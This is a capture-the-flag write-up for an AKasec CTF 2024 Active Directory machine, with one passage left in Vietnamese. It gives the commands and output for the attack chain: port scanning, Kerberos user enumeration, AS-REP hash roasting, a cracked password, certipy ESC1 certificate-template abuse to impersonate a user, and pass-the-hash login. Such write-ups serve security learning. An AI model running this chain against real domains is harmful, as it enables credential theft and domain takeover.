AKasec CTF 2024 ( English Writeup )
Version English
BOXS
-> Start Recon by Scan port open , services are open
Result :
nmap -A -T4 172.200.160.57 [ 9:53PM ]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-08 21:54 +07
Nmap scan report for 172.200.160.57
Host is up (0.27s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-08 14:58:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: aka.sex, Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: aka
| NetBIOS_Domain_Name: aka
| NetBIOS_Computer_Name: akasec-ctf-2024
| DNS_Domain_Name: aka.sex
| DNS_Computer_Name: akasec-ctf-2024.aka.sex
| DNS_Tree_Name: aka.sex
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-08T14:59:08+00:00
| ssl-cert: Subject: commonName=akasec-ctf-2024.aka.sex
| Not valid before: 2024-06-06T18:06:03
|_Not valid after: 2024-12-06T18:06:03
|_ssl-date: 2024-06-08T14:59:46+00:00; 0s from scanner time.
Service Info: Host: akasec-ctf-2024; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-08T14:59:06
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 326.45 seconds
After trying through ports 3268 LDAP, and port 80, it is static web. (Possible RFC for the following)
Test the SMB service by logging in as an anonymous user because it is possible but without opening the share so there is nothing
-> Try Brute Force Username of Kerberos, tool used: kerbrute
These usernames are valid, meaning they exist in the Active Directory system of the aka.sex domain. This means that these accounts may exist and can be used to attempt other attack techniques, such as password brute-force or attacks through other security vulnerabilities.
However, not every user can have a background connection that needs to be tested through the users found here
Valid User Found :joseph.hughes@aka.sex
How to Test : Use impacket's toolkit, specifically impacket-GetNPUsers, to extract user Kerberos login information (tickets) in an Active Directory (AD) environment.
joseph.hughesThere is this user's hash to crack (you can use john or hashcat), here I have finished cracking so I will show it:
Look for vulnerable certificate templates that can be exploited :
certipy-ad find -scheme ldap -username joseph.hughes -password '!!fth!!692!!gyh!!67t!ha' -dc-ip 172.200.160.57 -stdout -vulnerable
Note : on Windows, it runs certipy, but Kali has a tool set called certipy-ad
Full Result :
certipy-ad find -scheme ldap -username joseph.hughes -password '!!fth!!692!!gyh!!67t!ha' -dc-ip 172.200.160.57 -stdout -vulnerable [11:06PM ]
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 15 enabled certificate templates
[*] Trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via CSRA
[!] Got error while trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via CSRA: Could not connect: [Errno 111] Connection refused
[*] Trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via RRP
[!] Got error while trying to get CA configuration for 'aka-akasec-ctf-2024-CA' via RRP: [Errno Connection error (10.0.0.9:445)] timed out
[!] Failed to get CA configuration for 'aka-akasec-ctf-2024-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : aka-akasec-ctf-2024-CA
DNS Name : akasec-ctf-2024.aka.sex
Certificate Subject : CN=aka-akasec-ctf-2024-CA, DC=aka, DC=sex
Certificate Serial Number : 3BC6654FD035E194432B15722AFF99D6
Certificate Validity Start : 2024-06-09 12:06:25+00:00
Certificate Validity End : 2029-06-09 12:16:24+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : 5777eb13-5939-4a48-8d46-8ae561da870a
Display Name : 5777eb13-5939-4a48-8d46-8ae561da870a
Certificate Authorities : aka-akasec-ctf-2024-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : SubjectAltRequireDirectoryGuid
EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 650430 hours
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AKA.SEX\Domain Users
Object Control Permissions
Owner : AKA.SEX\Enterprise Admins
Full Control Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Owner Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Dacl Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Property Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
[!] Vulnerabilities
ESC1 : 'AKA.SEX\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
1
Template Name : 014ca453-3bea-405a-a9be-fbbada9e1d5a
Display Name : 014ca453-3bea-405a-a9be-fbbada9e1d5a
Certificate Authorities : aka-akasec-ctf-2024-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 650430 hours
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AKA.SEX\Domain Users
Object Control Permissions
Owner : AKA.SEX\Enterprise Admins
Full Control Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Owner Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Dacl Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Property Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
[!] Vulnerabilities
ESC3 : 'AKA.SEX\\Domain Users' can enroll and template has Certificate Request Agent EKU set
2
Template Name : e4bf4d28-76f8-4b2f-b491-7843c4223a92
Display Name : e4bf4d28-76f8-4b2f-b491-7843c4223a92
Enabled : False
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Smart Card Logon
Server Authentication
KDC Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 650430 hours
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AKA.SEX\Domain Users
Object Control Permissions
Owner : AKA.SEX\Enterprise Admins
Full Control Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Owner Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Dacl Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
Write Property Principals : AKA.SEX\Domain Admins
AKA.SEX\Local System
AKA.SEX\Enterprise Admins
[!] Vulnerabilities
ESC1 : 'AKA.SEX\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
Take advantage of vulnerabilities in: ESC1 and ESC3
ESC1 (Enrollment Services Configuration 1):
Description: This vulnerability occurs when any user in the
Domain Usersgroup has permission to request a certificate from this template, and the template allows the requester to provide the Subject of the certificate. This may result in the issuance of certificates for Client Authentication purposes.Affected Templates:
5777eb13-5939-4a48-8d46-8ae561da870ae4bf4d28-76f8-4b2f-b491-7843c4223a92(This template is currently not enabled - Enabled: False)
ESC3 (Enrollment Services Configuration 3):
Mô tả: Lỗ hổng này xảy ra khi bất kỳ người dùng nào trong nhóm
Domain Userscó quyền yêu cầu chứng chỉ từ template này, và template này cóCertificate Request Agent EKUđược đặt. Điều này có thể cho phép người yêu cầu chứng chỉ thực hiện các hành động yêu cầu chứng chỉ khác thay mặt cho người khác.Templates bị ảnh hưởng:
014ca453-3bea-405a-a9be-fbbada9e1d5a
I will request a certificate from the template 5777eb13-5939-4a48-8d46-8ae561da870a:
certipy-ad req -username joseph.hughes@aka.sex -password '!!fth!!692!!gyh!!67t!ha' -target-ip aka.sex -ca 'aka-akasec-ctf-2024-CA' -template '5777eb13-5939-4a48-8d46-8ae561da870a' -upn 'kexa@aka.sex'
Obtain cert form .pfx :
Authenticate to AD:
Use the PFX certificate to authenticate to the Active Directory environment of the aka.sex domain through the Domain Controller at the post's IP address 172.200.160.57.
certipy-ad auth -pfx 'kexa.pfx' -username 'kexa' -domain 'aka.sex' -dc-ip 172.200.160.57
After having the hash, you can now log in with this hash to the server:
You can use impacker-smbexec to login or crackmapexec is also possible
The necessary flag will be in the User kexa folder in the Desktop folder:
Last updated